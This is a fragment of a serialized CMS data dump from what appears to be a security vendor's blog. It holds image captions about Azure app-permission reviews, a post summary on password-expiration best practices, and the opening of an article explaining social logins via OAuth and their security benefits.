":329766,"data":329768},[329767],{"type":194},{},{"nodeType":173,"value":270305,"marks":329770,"data":329771},[],{},{"nodeType":178,"data":329773,"content":329774},{},[329775,329778,329785],{"nodeType":173,"value":270312,"marks":329776,"data":329777},[],{},{"nodeType":186,"data":329779,"content":329780},{"uri":270210},[329781],{"nodeType":173,"value":270319,"marks":329782,"data":329784},[329783],{"type":194},{},{"nodeType":173,"value":270324,"marks":329786,"data":329787},[],{},{"nodeType":178,"data":329789,"content":329790},{},[329791],{"nodeType":173,"value":270331,"marks":329792,"data":329793},[],{},{"nodeType":178,"data":329795,"content":329796},{},[329797,329800,329807,329810,329817],{"nodeType":173,"value":270338,"marks":329798,"data":329799},[],{},{"nodeType":186,"data":329801,"content":329802},{"uri":270343},[329803],{"nodeType":173,"value":270346,"marks":329804,"data":329806},[329805],{"type":194},{},{"nodeType":173,"value":270351,"marks":329808,"data":329809},[],{},{"nodeType":186,"data":329811,"content":329812},{"uri":270356},[329813],{"nodeType":173,"value":270359,"marks":329814,"data":329816},[329815],{"type":194},{},{"nodeType":173,"value":270364,"marks":329818,"data":329819},[],{},{"nodeType":235,"data":329821,"content":329822},{},[329823],{"nodeType":173,"value":269442,"marks":329824,"data":329825},[],{},{"nodeType":178,"data":329827,"content":329828},{},[329829],{"nodeType":173,"value":270377,"marks":329830,"data":329831},[],{},{"nodeType":178,"data":329833,"content":329834},{},[329835],{"nodeType":173,"value":270384,"marks":329836,"data":329837},[],{},{"nodeType":178,"data":329839,"content":329840},{},[329841],{"nodeType":173,"value":270391,"marks":329842,"data":329843},[],{},{"nodeType":169,"data":329845,"content":329846},{},[329847],{"nodeType":173,"value":270398,"marks":329848,"data":329849},[],{},{"nodeType":178,"data":329851,"content":329852},{},[329853],{"nodeType":173,"value":270405,"marks":329854,"data":329855},[],{},{"nodeType":235,"data":329857,"content":329858},{},[329859],{"nodeType":173,"value":270412,"marks":329860,"data":329861},[],{},{"nodeType":178,"data":329863,"content":329864},{},[329865,329868,329875],{"nodeType":173,"value":270419,"marks":329866,"data":329867},[],{},{"nodeType":186,"data":329869,"content":329870},{"uri":270424},[329871],{"nodeType":173,"value":270427,"marks":329872,"data":329874},[329873],{"type":194},{},{"nodeType":173,"value":270432,"marks":329876,"data":329877},[],{},{"nodeType":312,"data":329879,"content":329882},{"target":329880},{"sys":329881},{"id":270439,"type":317,"linkType":318},[],{"nodeType":178,"data":329884,"content":329885},{},[329886],{"nodeType":173,"value":270445,"marks":329887,"data":329888},[],{},{"nodeType":178,"data":329890,"content":329891},{},[329892,329895,329901],{"nodeType":173,"value":270452,"marks":329893,"data":329894},[],{},{"nodeType":186,"data":329896,"content":329897},{"uri":270457},[329898],{"nodeType":173,"value":270460,"marks":329899,"data":329900},[],{},{"nodeType":173,"value":270464,"marks":329902,"data":329903},[],{},{"nodeType":235,"data":329905,"content":329906},{},[329907],{"nodeType":173,"value":270471,"marks":329908,"data":329909},[],{},{"nodeType":178,"data":329911,"content":329912},{},[329913],{"nodeType":173,"value":270478,"marks":329914,"data":329915},[],{},{"nodeType":312,"data":329917,"content":329920},{"target":329918},{"sys":329919},{"id":270485,"type":317,"linkType":318},[],{"nodeType":235,"data":329922,"content":329923},{},[329924],{"nodeType":173,"value":270491,"marks":329925,"data":329926},[],{},{"nodeType":178,"data":329928,"content":329929},{},[329930],{"nodeType":173,"value":270498,"marks":329931,"data":329932},[],{},{"nodeType":312,"data":329934,"content":329937},{"target":329935},{"sys":329936},{"id":270505,"type":317,"linkType":318},[],{"nodeType":235,"data":329939,"content":329940},{},[329941],{"nodeType":173,"value":270511,"marks":329942,"data":329943},[],{},{"nodeType":178,"data":329945,"content":329946},{},[329947,329950,329957,329960,329967,329970,329977],{"nodeType":173,"value":270518,"marks":329948,"data":329949},[],{},{"nodeType":186,"data":329951,"content":329952},{"uri":270523},[329953],{"nodeType":173,"value":270526,"marks":329954,"data":329956},[329955],{"type":194},{},{"nodeType":173,"value":270531,"marks":329958,"data":329959},[],{},{"nodeType":186,"data":329961,"content":329962},{"uri":270536},[329963],{"nodeType":173,"value":270539,"marks":329964,"data":329966},[329965],{"type":194},{},{"nodeType":173,"value":270544,"marks":329968,"data":329969},[],{},{"nodeType":186,"data":329971,"content":329972},{"uri":270549},[329973],{"nodeType":173,"value":270552,"marks":329974,"data":329976},[329975],{"type":194},{},{"nodeType":173,"value":270557,"marks":329978,"data":329979},[],{},{"nodeType":178,"data":329981,"content":329982},{},[329983],{"nodeType":173,"value":270564,"marks":329984,"data":329985},[],{},{"nodeType":312,"data":329987,"content":329990},{"target":329988},{"sys":329989},{"id":270571,"type":317,"linkType":318},[],{"nodeType":178,"data":329992,"content":329993},{},[329994],{"nodeType":173,"value":270577,"marks":329995,"data":329996},[],{},{"nodeType":312,"data":329998,"content":330001},{"target":329999},{"sys":330000},{"id":270584,"type":317,"linkType":318},[],{"nodeType":235,"data":330003,"content":330004},{},[330005],{"nodeType":173,"value":270590,"marks":330006,"data":330007},[],{},{"nodeType":178,"data":330009,"content":330010},{},[330011],{"nodeType":173,"value":270597,"marks":330012,"data":330013},[],{},{"nodeType":178,"data":330015,"content":330016},{},[330017,330020,330027,330030,330037],{"nodeType":173,"value":270604,"marks":330018,"data":330019},[],{},{"nodeType":186,"data":330021,"content":330022},{"uri":270609},[330023],{"nodeType":173,"value":270612,"marks":330024,"data":330026},[330025],{"type":194},{},{"nodeType":173,"value":270617,"marks":330028,"data":330029},[],{},{"nodeType":186,"data":330031,"content":330032},{"uri":270622},[330033],{"nodeType":173,"value":270625,"marks":330034,"data":330036},[330035],{"type":194},{},{"nodeType":173,"value":270630,"marks":330038,"data":330039},[],{},{"nodeType":169,"data":330041,"content":330042},{},[330043],{"nodeType":173,"value":40632,"marks":330044,"data":330045},[],{},{"nodeType":178,"data":330047,"content":330048},{},[330049],{"nodeType":173,"value":270643,"marks":330050,"data":330051},[],{},{"nodeType":178,"data":330053,"content":330054},{},[330055],{"nodeType":173,"value":270650,"marks":330056,"data":330057},[],{},{"nodeType":178,"data":330059,"content":330060},{},[330061],{"nodeType":173,"value":270657,"marks":330062,"data":330063},[],{},{"nodeType":178,"data":330065,"content":330066},{},[330067],{"nodeType":173,"value":270664,"marks":330068,"data":330069},[],{},{"nodeType":312,"data":330071,"content":330074},{"target":330072},{"sys":330073},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":330076,"content":330077},{},[330078],{"nodeType":173,"value":37,"marks":330079,"data":330080},[],{},{"entries":330082},{"inline":330083,"hyperlink":330084,"block":330091},[],[330085,330087],{"sys":330086,"__typename":1528,"title":271616,"slug":271619},{"id":269414},{"sys":330088,"__typename":1528,"title":330089,"slug":330090},{"id":269483},"Is it safe to allow my employees to connect third-party apps to our M365/Google Workspace tenant?","is-it-safe-to-allow-my-employees-to-connect-third-party-apps-to-our-m365",[330092,330099,330106,330113,330120,330126,330133,330141,330148,330155,330162],{"sys":330093,"__typename":5345,"title":330094,"caption":118,"layoutMode":328274,"file":330095},{"id":269436},"Consent phishing example",{"url":330096,"width":330097,"height":330098},"https://images.ctfassets.net/y1cdw1ablpvd/6HYzFiGjBi8ae4IDlDhtbx/238e9456dfe0aa62b5723f95a944be36/image2.png",500,765,{"sys":330100,"__typename":5345,"title":330101,"caption":330102,"layoutMode":328274,"file":330103},{"id":269498},"User consent for applications","Microsoft 365 permission-configuring page options",{"url":330104,"width":51607,"height":330105},"https://images.ctfassets.net/y1cdw1ablpvd/65HmUDGZM8VCDRIeUUdEPY/3fe867fef120cc2190f8440d11b760f7/image9.png",288,{"sys":330107,"__typename":5345,"title":330108,"caption":330109,"layoutMode":328274,"file":330110},{"id":269966},"Adobe app integration details","Push's integration panel with our Adobe app details with verified publisher information",{"url":330111,"width":330112,"height":296772},"https://images.ctfassets.net/y1cdw1ablpvd/6Rg5TnvmAqZDFFyVx5x5I1/34fa8feaeb3775b6a96d6089772540be/image7.png",651,{"sys":330114,"__typename":5345,"title":330115,"caption":330116,"layoutMode":328274,"file":330117},{"id":269979},"Acrobat integration details","Push's integration panel with our Adobe app details. This instance shows unverified, but is not malicious",{"url":330118,"width":330119,"height":84285},"https://images.ctfassets.net/y1cdw1ablpvd/3dKH7ObNU1nRkqvOUKuqw0/0ed37374b74952164b589f9b9b60aa29/image6.png",663,{"sys":330121,"__typename":5345,"title":330122,"caption":330123,"layoutMode":328274,"file":330124},{"id":270039},"Diagrams.net oauth integration panel","Example of a Microsoft integration that was granted excessive permissions (Sites.Read.All)",{"url":330125,"width":182472,"height":12019},"https://images.ctfassets.net/y1cdw1ablpvd/1dbB6L6VNOL332mmGI4szQ/13a6a7dd456303fc75a404a44407653c/image5.png",{"sys":330127,"__typename":5345,"title":330128,"caption":330129,"layoutMode":328274,"file":330130},{"id":270439},"Azure active directory","An application's sign-in logs detailing user activity",{"url":330131,"width":167323,"height":330132},"https://images.ctfassets.net/y1cdw1ablpvd/6fHOFS9XjBLpUQBdgjrsoc/61411340965dd7c158e8e5b94671654a/image3.png",545,{"sys":330134,"__typename":5345,"title":330135,"caption":330136,"layoutMode":328274,"file":330137},{"id":270485},"Azure enterprise app audit log page","Azure enterprise applications audit log page detailing the scopes that were delegated to a sign-in event.",{"url":330138,"width":330139,"height":330140},"https://images.ctfassets.net/y1cdw1ablpvd/75u2Mq5FiX2rVW1760QSNf/22cf898dd65e38ce7e6f585486148987/image1.png",748,229,{"sys":330142,"__typename":5345,"title":330143,"caption":330143,"layoutMode":328274,"file":330144},{"id":270505},"Disabling an Azure application integration",{"url":330145,"width":330146,"height":330147},"https://images.ctfassets.net/y1cdw1ablpvd/2qiV0t6oaYhIEHpJTh7VS5/b7b04792ad8c9c575b238ce629c5de9d/image8.png",984,300,{"sys":330149,"__typename":5345,"title":330150,"caption":330151,"layoutMode":328274,"file":330152},{"id":270571},"Azure permission review tab","Navigating to the permission review tab for an integrated application",{"url":330153,"width":272694,"height":330154},"https://images.ctfassets.net/y1cdw1ablpvd/2JtsVllKju7mumigafESsj/174a50115c736a288e2c3182a31c4e9d/image10.png",579,{"sys":330156,"__typename":5345,"title":330157,"caption":330158,"layoutMode":328274,"file":330159},{"id":270584},"Revoking access","Auto-generated PowerShell scripts to revoke access to an integrated application.",{"url":330160,"width":57896,"height":330161},"https://images.ctfassets.net/y1cdw1ablpvd/2VNTXdvWQeAmD2TTlz7iDA/2e26e2943f593315c32b82f58f20a665/image4.png",671,{"sys":330163,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},"content:blog:how-attackers-compromise-azure-organizations-through-saas-apps.json","blog/how-attackers-compromise-azure-organizations-through-saas-apps.json","blog/how-attackers-compromise-azure-organizations-through-saas-apps",{"_path":330168,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":330169,"ogImage":118,"summary":330172,"title":330183,"subtitle":118,"metaTitle":330184,"synopsis":330185,"hashTags":118,"publishedDate":330186,"slug":330187,"tagsCollection":330188,"relatedBlogPostsCollection":330194,"authorsCollection":331251,"content":331255,"_id":331565,"_type":5439,"_source":5440,"_file":331566,"_stem":331567,"_extension":5439},"/blog/password-expirations-dont-work-try-these-best-practices-instead",{"id":330170,"publishedAt":330171},"38LFVv412IBfFmoBCHosy1","2024-03-21T09:25:48.011Z",{"json":330173},{"data":330174,"content":330175,"nodeType":165},{},[330176],{"data":330177,"content":330178,"nodeType":178},{},[330179],{"data":330180,"marks":330181,"value":330182,"nodeType":173},{},[],"Password expirations lead to more predictable passwords. Use password managers, MFA, to prevent password theft.","Password expirations don’t work. Try these best practices instead.","Password best practices for improving security posture","Password expirations are still commonly recommended, but most security pros agree that they lead to more predictable passwords. Here's what to do instead.","2022-12-15T00:00:00.000Z","password-expirations-dont-work-try-these-best-practices-instead",{"items":330189},[330190,330192],{"sys":330191,"name":26133},{"id":26132},{"sys":330193,"name":26137},{"id":26136},{"items":330195},[330196,330868],{"__typename":1528,"sys":330197,"content":330198,"title":271423,"synopsis":271424,"hashTags":330857,"publishedDate":271426,"slug":271427,"tagsCollection":330858,"authorsCollection":330864},{"id":270693},{"json":330199},{"data":330200,"content":330201,"nodeType":165},{},[330202,330215,330221,330260,330266,330305,330311,330650,330655,330661,330667,330673,330679,330684,330690,330696,330702,330708,330714,330720,330726,330732,330747,330753,330759,330765,330771,330777,330801,330807,330813,330819,330825,330831,330837,330840,330846,330851],{"data":330203,"content":330204,"nodeType":178},{},[330205,330208,330212],{"data":330206,"marks":330207,"value":270704,"nodeType":173},{},[],{"data":330209,"marks":330210,"value":270709,"nodeType":173},{},[330211],{"type":370},{"data":330213,"marks":330214,"value":270713,"nodeType":173},{},[],{"data":330216,"content":330217,"nodeType":178},{},[330218],{"data":330219,"marks":330220,"value":270720,"nodeType":173},{},[],{"data":330222,"content":330223,"nodeType":250},{},[330224,330233,330242,330251],{"data":330225,"content":330226,"nodeType":254},{},[330227],{"data":330228,"content":330229,"nodeType":178},{},[330230],{"data":330231,"marks":330232,"value":270733,"nodeType":173},{},[],{"data":330234,"content":330235,"nodeType":254},{},[330236],{"data":330237,"content":330238,"nodeType":178},{},[330239],{"data":330240,"marks":330241,"value":270743,"nodeType":173},{},[],{"data":330243,"content":330244,"nodeType":254},{},[330245],{"data":330246,"content":330247,"nodeType":178},{},[330248],{"data":330249,"marks":330250,"value":270753,"nodeType":173},{},[],{"data":330252,"content":330253,"nodeType":254},{},[330254],{"data":330255,"content":330256,"nodeType":178},{},[330257],{"data":330258,"marks":330259,"value":270763,"nodeType":173},{},[],{"data":330261,"content":330262,"nodeType":235},{},[330263],{"data":330264,"marks":330265,"value":270770,"nodeType":173},{},[],{"data":330267,"content":330268,"nodeType":250},{},[330269,330278,330296],{"data":330270,"content":330271,"nodeType":254},{},[330272],{"data":330273,"content":330274,"nodeType":178},{},[330275],{"data":330276,"marks":330277,"value":270783,"nodeType":173},{},[],{"data":330279,"content":330280,"nodeType":254},{},[330281],{"data":330282,"content":330283,"nodeType":178},{},[330284,330287,330293],{"data":330285,"marks":330286,"value":270793,"nodeType":173},{},[],{"data":330288,"content":330289,"nodeType":186},{"uri":270796},[330290],{"data":330291,"marks":330292,"value":270801,"nodeType":173},{},[],{"data":330294,"marks":330295,"value":270805,"nodeType":173},{},[],{"data":330297,"content":330298,"nodeType":254},{},[330299],{"data":330300,"content":330301,"nodeType":178},{},[330302],{"data":330303,"marks":330304,"value":270815,"nodeType":173},{},[],{"data":330306,"content":330307,"nodeType":178},{},[330308],{"data":330309,"marks":330310,"value":270822,"nodeType":173},{},[],{"data":330312,"content":330313,"nodeType":1653},{},[330314,330362,330410,330458,330506,330554,330602],{"data":330315,"content":330316,"nodeType":1657},{},[330317,330326,330335,330344,330353],{"data":330318,"content":330319,"nodeType":1661},{},[330320],{"data":330321,"content":330322,"nodeType":178},{},[330323],{"data":330324,"marks":330325,"value":270838,"nodeType":173},{},[],{"data":330327,"content":330328,"nodeType":1661},{},[330329],{"data":330330,"content":330331,"nodeType":178},{},[330332],{"data":330333,"marks":330334,"value":270848,"nodeType":173},{},[],{"data":330336,"content":330337,"nodeType":1661},{},[330338],{"data":330339,"content":330340,"nodeType":178},{},[330341],{"data":330342,"marks":330343,"value":266156,"nodeType":173},{},[],{"data":330345,"content":330346,"nodeType":1661},{},[330347],{"data":330348,"content":330349,"nodeType":178},{},[330350],{"data":330351,"marks":330352,"value":270867,"nodeType":173},{},[],{"data":330354,"content":330355,"nodeType":1661},{},[330356],{"data":330357,"content":330358,"nodeType":178},{},[330359],{"data":330360,"marks":330361,"value":270877,"nodeType":173},{},[],{"data":330363,"content":330364,"nodeType":1657},{},[330365,330374,330383,330392,330401],{"data":330366,"content":330367,"nodeType":1687},{},[330368],{"data":330369,"content":330370,"nodeType":178},{},[330371],{"data":330372,"marks":330373,"value":270890,"nodeType":173},{},[],{"data":330375,"content":330376,"nodeType":1687},{},[330377],{"data":330378,"content":330379,"nodeType":178},{},[330380],{"data":330381,"marks":330382,"value":270900,"nodeType":173},{},[],{"data":330384,"content":330385,"nodeType":1687},{},[330386],{"data":330387,"content":330388,"nodeType":178},{},[330389],{"data":330390,"marks":330391,"value":270900,"nodeType":173},{},[],{"data":330393,"content":330394,"nodeType":1687},{},[330395],{"data":330396,"content":330397,"nodeType":178},{},[330398],{"data":330399,"marks":330400,"value":270919,"nodeType":173},{},[],{"data":330402,"content":330403,"nodeType":1687},{},[330404],{"data":330405,"content":330406,"nodeType":178},{},[330407],{"data":330408,"marks":330409,"value":270929,"nodeType":173},{},[],{"data":330411,"content":330412,"nodeType":1657},{},[330413,330422,330431,330440,330449],{"data":330414,"content":330415,"nodeType":1687},{},[330416],{"data":330417,"content":330418,"nodeType":178},{},[330419],{"data":330420,"marks":330421,"value":270942,"nodeType":173},{},[],{"data":330423,"content":330424,"nodeType":1687},{},[330425],{"data":330426,"content":330427,"nodeType":178},{},[330428],{"data":330429,"marks":330430,"value":270952,"nodeType":173},{},[],{"data":330432,"content":330433,"nodeType":1687},{},[330434],{"data":330435,"content":330436,"nodeType":178},{},[330437],{"data":330438,"marks":330439,"value":270900,"nodeType":173},{},[],{"data":330441,"content":330442,"nodeType":1687},{},[330443],{"data":330444,"content":330445,"nodeType":178},{},[330446],{"data":330447,"marks":330448,"value":270919,"nodeType":173},{},[],{"data":330450,"content":330451,"nodeType":1687},{},[330452],{"data":330453,"content":330454,"nodeType":178},{},[330455],{"data":330456,"marks":330457,"value":270929,"nodeType":173},{},[],{"data":330459,"content":330460,"nodeType":1657},{},[330461,330470,330479,330488,330497],{"data":330462,"content":330463,"nodeType":1687},{},[330464],{"data":330465,"content":330466,"nodeType":178},{},[330467],{"data":330468,"marks":330469,"value":270992,"nodeType":173},{},[],{"data":330471,"content":330472,"nodeType":1687},{},[330473],{"data":330474,"content":330475,"nodeType":178},{},[330476],{"data":330477,"marks":330478,"value":271002,"nodeType":173},{},[],{"data":330480,"content":330481,"nodeType":1687},{},[330482],{"data":330483,"content":330484,"nodeType":178},{},[330485],{"data":330486,"marks":330487,"value":271002,"nodeType":173},{},[],{"data":330489,"content":330490,"nodeType":1687},{},[330491],{"data":330492,"content":330493,"nodeType":178},{},[330494],{"data":330495,"marks":330496,"value":271021,"nodeType":173},{},[],{"data":330498,"content":330499,"nodeType":1687},{},[330500],{"data":330501,"content":330502,"nodeType":178},{},[330503],{"data":330504,"marks":330505,"value":271031,"nodeType":173},{},[],{"data":330507,"content":330508,"nodeType":1657},{},[330509,330518,330527,330536,330545],{"data":330510,"content":330511,"nodeType":1687},{},[330512],{"data":330513,"content":330514,"nodeType":178},{},[330515],{"data":330516,"marks":330517,"value":271044,"nodeType":173},{},[],{"data":330519,"content":330520,"nodeType":1687},{},[330521],{"data":330522,"content":330523,"nodeType":178},{},[330524],{"data":330525,"marks":330526,"value":271002,"nodeType":173},{},[],{"data":330528,"content":330529,"nodeType":1687},{},[330530],{"data":330531,"content":330532,"nodeType":178},{},[330533],{"data":330534,"marks":330535,"value":271002,"nodeType":173},{},[],{"data":330537,"content":330538,"nodeType":1687},{},[330539],{"data":330540,"content":330541,"nodeType":178},{},[330542],{"data":330543,"marks":330544,"value":270919,"nodeType":173},{},[],{"data":330546,"content":330547,"nodeType":1687},{},[330548],{"data":330549,"content":330550,"nodeType":178},{},[330551],{"data":330552,"marks":330553,"value":271031,"nodeType":173},{},[],{"data":330555,"content":330556,"nodeType":1657},{},[330557,330566,330575,330584,330593],{"data":330558,"content":330559,"nodeType":1687},{},[330560],{"data":330561,"content":330562,"nodeType":178},{},[330563],{"data":330564,"marks":330565,"value":271093,"nodeType":173},{},[],{"data":330567,"content":330568,"nodeType":1687},{},[330569],{"data":330570,"content":330571,"nodeType":178},{},[330572],{"data":330573,"marks":330574,"value":271103,"nodeType":173},{},[],{"data":330576,"content":330577,"nodeType":1687},{},[330578],{"data":330579,"content":330580,"nodeType":178},{},[330581],{"data":330582,"marks":330583,"value":271103,"nodeType":173},{},[],{"data":330585,"content":330586,"nodeType":1687},{},[330587],{"data":330588,"content":330589,"nodeType":178},{},[330590],{"data":330591,"marks":330592,"value":271122,"nodeType":173},{},[],{"data":330594,"content":330595,"nodeType":1687},{},[330596],{"data":330597,"content":330598,"nodeType":178},{},[330599],{"data":330600,"marks":330601,"value":270929,"nodeType":173},{},[],{"data":330603,"content":330604,"nodeType":1657},{},[330605,330614,330623,330632,330641],{"data":330606,"content":330607,"nodeType":1687},{},[330608],{"data":330609,"content":330610,"nodeType":178},{},[330611],{"data":330612,"marks":330613,"value":271144,"nodeType":173},{},[],{"data":330615,"content":330616,"nodeType":1687},{},[330617],{"data":330618,"content":330619,"nodeType":178},{},[330620],{"data":330621,"marks":330622,"value":271103,"nodeType":173},{},[],{"data":330624,"content":330625,"nodeType":1687},{},[330626],{"data":330627,"content":330628,"nodeType":178},{},[330629],{"data":330630,"marks":330631,"value":271103,"nodeType":173},{},[],{"data":330633,"content":330634,"nodeType":1687},{},[330635],{"data":330636,"content":330637,"nodeType":178},{},[330638],{"data":330639,"marks":330640,"value":271122,"nodeType":173},{},[],{"data":330642,"content":330643,"nodeType":1687},{},[330644],{"data":330645,"content":330646,"nodeType":178},{},[330647],{"data":330648,"marks":330649,"value":270929,"nodeType":173},{},[],{"data":330651,"content":330654,"nodeType":312},{"target":330652},{"sys":330653},{"id":271185,"type":317,"linkType":318},[],{"data":330656,"content":330657,"nodeType":235},{},[330658],{"data":330659,"marks":330660,"value":270890,"nodeType":173},{},[],{"data":330662,"content":330663,"nodeType":178},{},[330664],{"data":330665,"marks":330666,"value":271199,"nodeType":173},{},[],{"data":330668,"content":330669,"nodeType":178},{},[330670],{"data":330671,"marks":330672,"value":271206,"nodeType":173},{},[],{"data":330674,"content":330675,"nodeType":178},{},[330676],{"data":330677,"marks":330678,"value":271213,"nodeType":173},{},[],{"data":330680,"content":330683,"nodeType":312},{"target":330681},{"sys":330682},{"id":271218,"type":317,"linkType":318},[],{"data":330685,"content":330686,"nodeType":235},{},[330687],{"data":330688,"marks":330689,"value":271226,"nodeType":173},{},[],{"data":330691,"content":330692,"nodeType":178},{},[330693],{"data":330694,"marks":330695,"value":271233,"nodeType":173},{},[],{"data":330697,"content":330698,"nodeType":178},{},[330699],{"data":330700,"marks":330701,"value":271240,"nodeType":173},{},[],{"data":330703,"content":330704,"nodeType":178},{},[330705],{"data":330706,"marks":330707,"value":271247,"nodeType":173},{},[],{"data":330709,"content":330710,"nodeType":178},{},[330711],{"data":330712,"marks":330713,"value":271254,"nodeType":173},{},[],{"data":330715,"content":330716,"nodeType":178},{},[330717],{"data":330718,"marks":330719,"value":271261,"nodeType":173},{},[],{"data":330721,"content":330722,"nodeType":235},{},[330723],{"data":330724,"marks":330725,"value":271268,"nodeType":173},{},[],{"data":330727,"content":330728,"nodeType":178},{},[330729],{"data":330730,"marks":330731,"value":271275,"nodeType":173},{},[],{"data":330733,"content":330734,"nodeType":178},{},[330735,330738,330744],{"data":330736,"marks":330737,"value":271282,"nodeType":173},{},[],{"data":330739,"content":330740,"nodeType":186},{"uri":271285},[330741],{"data":330742,"marks":330743,"value":271290,"nodeType":173},{},[],{"data":330745,"marks":330746,"value":271294,"nodeType":173},{},[],{"data":330748,"content":330749,"nodeType":178},{},[330750],{"data":330751,"marks":330752,"value":271301,"nodeType":173},{},[],{"data":330754,"content":330755,"nodeType":178},{},[330756],{"data":330757,"marks":330758,"value":271308,"nodeType":173},{},[],{"data":330760,"content":330761,"nodeType":178},{},[330762],{"data":330763,"marks":330764,"value":271315,"nodeType":173},{},[],{"data":330766,"content":330767,"nodeType":235},{},[330768],{"data":330769,"marks":330770,"value":271322,"nodeType":173},{},[],{"data":330772,"content":330773,"nodeType":178},{},[330774],{"data":330775,"marks":330776,"value":271329,"nodeType":173},{},[],{"data":330778,"content":330779,"nodeType":178},{},[330780,330783,330789,330792,330798],{"data":330781,"marks":330782,"value":271336,"nodeType":173},{},[],{"data":330784,"content":330785,"nodeType":186},{"uri":271339},[330786],{"data":330787,"marks":330788,"value":271344,"nodeType":173},{},[],{"data":330790,"marks":330791,"value":271348,"nodeType":173},{},[],{"data":330793,"content":330794,"nodeType":186},{"uri":270796},[330795],{"data":330796,"marks":330797,"value":271355,"nodeType":173},{},[],{"data":330799,"marks":330800,"value":271359,"nodeType":173},{},[],{"data":330802,"content":330803,"nodeType":178},{},[330804],{"data":330805,"marks":330806,"value":271366,"nodeType":173},{},[],{"data":330808,"content":330809,"nodeType":178},{},[330810],{"data":330811,"marks":330812,"value":271373,"nodeType":173},{},[],{"data":330814,"content":330815,"nodeType":178},{},[330816],{"data":330817,"marks":330818,"value":271380,"nodeType":173},{},[],{"data":330820,"content":330821,"nodeType":235},{},[330822],{"data":330823,"marks":330824,"value":271387,"nodeType":173},{},[],{"data":330826,"content":330827,"nodeType":178},{},[330828],{"data":330829,"marks":330830,"value":271394,"nodeType":173},{},[],{"data":330832,"content":330833,"nodeType":178},{},[330834],{"data":330835,"marks":330836,"value":271401,"nodeType":173},{},[],{"data":330838,"content":330839,"nodeType":231},{},[],{"data":330841,"content":330842,"nodeType":178},{},[330843],{"data":330844,"marks":330845,"value":271411,"nodeType":173},{},[],{"data":330847,"content":330850,"nodeType":312},{"target":330848},{"sys":330849},{"id":209109,"type":317,"linkType":318},[],{"data":330852,"content":330853,"nodeType":178},{},[330854],{"data":330855,"marks":330856,"value":37,"nodeType":173},{},[],[182376],{"items":330859},[330860,330862],{"sys":330861,"name":26133},{"id":26132},{"sys":330863,"name":26137},{"id":26136},{"items":330865},[330866],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":330867},{"url":19129},{"__typename":1528,"sys":330869,"content":330870,"title":284931,"synopsis":331239,"hashTags":118,"publishedDate":331240,"slug":284932,"tagsCollection":331241,"authorsCollection":331247},{"id":273995},{"json":330871},{"data":330872,"content":330873,"nodeType":165},{},[330874,330881,330888,330894,330901,330907,330914,330921,330928,330935,330942,330948,330955,330962,330969,330987,331005,331023,331052,331078,331096,331103,331110,331117,331124,331131,331138,331156,331187,331194,331212,331219,331226,331232],{"data":330875,"content":330876,"nodeType":178},{},[330877],{"data":330878,"marks":330879,"value":330880,"nodeType":173},{},[],"We have all seen the option on websites to login using a variety of different tech giant accounts (“Login with Google, Login with Microsoft”), instead of creating a new account or using username and password. This is known as a social login and, less often, social sign-in or social sign-on. ",{"data":330882,"content":330883,"nodeType":178},{},[330884],{"data":330885,"marks":330886,"value":330887,"nodeType":173},{},[],"Normally, this is more associated with personal use than business use, but it’s just as possible for employees to log into a SaaS platform using a business Google Workspace account - but should we be encouraging or discouraging this behavior? We’ll answer that question in this article but, spoiler alert, at Push Security we encourage it in most cases and we’ll explain why in this article. ",{"data":330889,"content":330893,"nodeType":312},{"target":330890},{"sys":330891},{"id":330892,"type":317,"linkType":318},"47o2DQc4uabGwXXN85HBUG",[],{"data":330895,"content":330896,"nodeType":178},{},[330897],{"data":330898,"marks":330899,"value":330900,"nodeType":173},{},[],"We've created a quick and dirty video demo of a social login to help explain the concept: ",{"data":330902,"content":330906,"nodeType":312},{"target":330903},{"sys":330904},{"id":330905,"type":317,"linkType":318},"2rIwQIeOZ9cZY47vUrYkf3",[],{"data":330908,"content":330909,"nodeType":235},{},[330910],{"data":330911,"marks":330912,"value":330913,"nodeType":173},{},[],"What is a social login?",{"data":330915,"content":330916,"nodeType":178},{},[330917],{"data":330918,"marks":330919,"value":330920,"nodeType":173},{},[],"So what actually happens when you click to login with Google? Aren’t you just giving your Google password to some random website? That’s a security concern many people have but, thankfully, that isn’t the case. ",{"data":330922,"content":330923,"nodeType":178},{},[330924],{"data":330925,"marks":330926,"value":330927,"nodeType":173},{},[],"Social logins actually work using OAuth 2.0, which stands for “Open Authorization.” It’s a standard to allow third-party apps to access your data. OAuth is actually for a much broader set of use cases than just social logins, but that’s for another article. ",{"data":330929,"content":330930,"nodeType":178},{},[330931],{"data":330932,"marks":330933,"value":330934,"nodeType":173},{},[],"Let’s focus on what happens when you click to sign-in with Google. You’re actually redirected to Google’s own servers and asked to authorize the website to be granted any access to your data that it has requested. In a simple social login case, the website should only be asking for minimal access to view simple details, such as your email address and full name in order to verify your identity.",{"data":330936,"content":330937,"nodeType":178},{},[330938],{"data":330939,"marks":330940,"value":330941,"nodeType":173},{},[],"If this is the case, Google does not even specifically ask you to accept those permissions, it just verifies which Google account you would like to use. If you are already logged in with Google then you won’t even need to enter your password.",{"data":330943,"content":330947,"nodeType":312},{"target":330944},{"sys":330945},{"id":330946,"type":317,"linkType":318},"2PbJH7qfRYIxJRBmHJLSdI",[],{"data":330949,"content":330950,"nodeType":178},{},[330951],{"data":330952,"marks":330953,"value":330954,"nodeType":173},{},[],"…and that’s it, you’ve just socially logged in to a website using your Google account. You didn’t need to create an account, set a password, use a password manager or even enter your Google password. It was so easy! But is it secure?",{"data":330956,"content":330957,"nodeType":169},{},[330958],{"data":330959,"marks":330960,"value":330961,"nodeType":173},{},[],"Security Benefits",{"data":330963,"content":330964,"nodeType":178},{},[330965],{"data":330966,"marks":330967,"value":330968,"nodeType":173},{},[],"The short answer is - yes, it is secure, and there are actually many security benefits. Let’s consider some of them:",{"data":330970,"content":330971,"nodeType":250},{},[330972],{"data":330973,"content":330974,"nodeType":254},{},[330975],{"data":330976,"content":330977,"nodeType":178},{},[330978,330983],{"data":330979,"marks":330980,"value":330982,"nodeType":173},{},[330981],{"type":370},"Multi-Factor authentication (MFA) everywhere!",{"data":330984,"marks":330985,"value":330986,"nodeType":173},{},[]," - You’ve followed good security practice and enabled MFA for all of your Google accounts, right? Great, well then every other SaaS platform that your employees use social logins just inherited MFA protection for free! Not only does the platform not even need to support MFA on its own (most don’t), but you don't even need to set it 